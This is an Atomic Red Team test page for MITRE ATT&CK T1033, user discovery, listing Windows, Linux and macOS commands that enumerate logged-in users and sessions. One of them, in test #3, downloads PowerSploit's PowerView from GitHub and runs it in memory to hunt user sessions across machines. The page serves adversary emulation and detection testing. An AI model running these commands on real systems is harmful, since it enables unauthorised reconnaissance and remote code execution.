# T1033 - System Owner/User Discovery
## [Description from ATT&CK](https://attack.mitre.org/techniques/T1033)
<blockquote>Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.

Various utilities and commands may acquire this information, including <code>whoami</code>. In macOS and Linux, the currently logged in user can be identified with <code>w</code> and <code>who</code>. On macOS the <code>dscl . list /Users | grep -v '_'</code> command can also be used to enumerate user accounts. Environment variables, such as <code>%USERNAME%</code> and <code>$USER</code>, may also be used to access this information.</blockquote>

## Atomic Tests

- [Atomic Test #1 - System Owner/User Discovery](#atomic-test-1---system-owneruser-discovery)

- [Atomic Test #2 - System Owner/User Discovery](#atomic-test-2---system-owneruser-discovery)

- [Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)](#atomic-test-3---find-computers-where-user-has-session---stealth-mode-powerview)

- [Atomic Test #4 - User Discovery With Env Vars PowerShell Script](#atomic-test-4---user-discovery-with-env-vars-powershell-script)

- [Atomic Test #5 - GetCurrent User with PowerShell Script](#atomic-test-5---getcurrent-user-with-powershell-script)


<br/>

## Atomic Test #1 - System Owner/User Discovery
Identify System owner or users on an endpoint.

Upon successful execution, cmd.exe will spawn multiple commands against a target host to identify usernames. Output will be via stdout. 
Additionally, two files will be written to disk - computers.txt and usernames.txt.

**Supported Platforms:** Windows


**auto_generated_guid:** 4c4959bf-addf-4b4a-be86-8d09cc1857aa





#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| computer_name | Name of remote computer | string | localhost|


#### Attack Commands: Run with `command_prompt`! 


```cmd
cmd.exe /C whoami
wmic useraccount get /ALL
quser /SERVER:"#{computer_name}"
quser
qwinsta.exe /server:#{computer_name}
qwinsta.exe
for /F "tokens=1,2" %i in ('qwinsta /server:#{computer_name} ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > computers.txt
@FOR /F %n in (computers.txt) DO @FOR /F "tokens=1,2" %i in ('qwinsta /server:%n ^| findstr "Active Disc"') do @echo %i | find /v "#" | find /v "console" || echo %j > usernames.txt
```






<br/>
<br/>

## Atomic Test #2 - System Owner/User Discovery
Identify System owner or users on an endpoint

Upon successful execution, sh will stdout list of usernames.

**Supported Platforms:** Linux, macOS


**auto_generated_guid:** 2a9b677d-a230-44f4-ad86-782df1ef108c






#### Attack Commands: Run with `sh`! 


```sh
users
w
who
```






<br/>
<br/>

## Atomic Test #3 - Find computers where user has session - Stealth mode (PowerView)
Find existing user session on other computers. Upon execution, information about any sessions discovered will be displayed.

**Supported Platforms:** Windows


**auto_generated_guid:** 29857f27-a36f-4f7e-8084-4557cd6207ca






#### Attack Commands: Run with `powershell`! 


```powershell
[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f94a5d298a1b4c5dfb1f30a246d9c73d13b22888/Recon/PowerView.ps1' -UseBasicParsing); Invoke-UserHunter -Stealth -Verbose
```






<br/>
<br/>

## Atomic Test #4 - User Discovery With Env Vars PowerShell Script
Use the PowerShell environment variables to identify the current logged user.

**Supported Platforms:** Windows


**auto_generated_guid:** dcb6cdee-1fb0-4087-8bf8-88cfd136ba51






#### Attack Commands: Run with `powershell`! 


```powershell
[System.Environment]::UserName | Out-File -FilePath .\CurrentactiveUser.txt 
$env:UserName | Out-File -FilePath .\CurrentactiveUser.txt -Append
```

#### Cleanup Commands:
```powershell
Remove-Item -Path .\CurrentactiveUser.txt -Force
```





<br/>
<br/>

## Atomic Test #5 - GetCurrent User with PowerShell Script
Use the PowerShell "GetCurrent" method of the WindowsIdentity .NET class to identify the logged user.

**Supported Platforms:** Windows


**auto_generated_guid:** 1392bd0f-5d5a-429e-81d9-eb9d4d4d5b3b






#### Attack Commands: Run with `powershell`! 


```powershell
[System.Security.Principal.WindowsIdentity]::GetCurrent() | Out-File -FilePath .\CurrentUserObject.txt
```

#### Cleanup Commands:
```powershell
Remove-Item -Path .\CurrentUserObject.txt -Force
```





<br/>
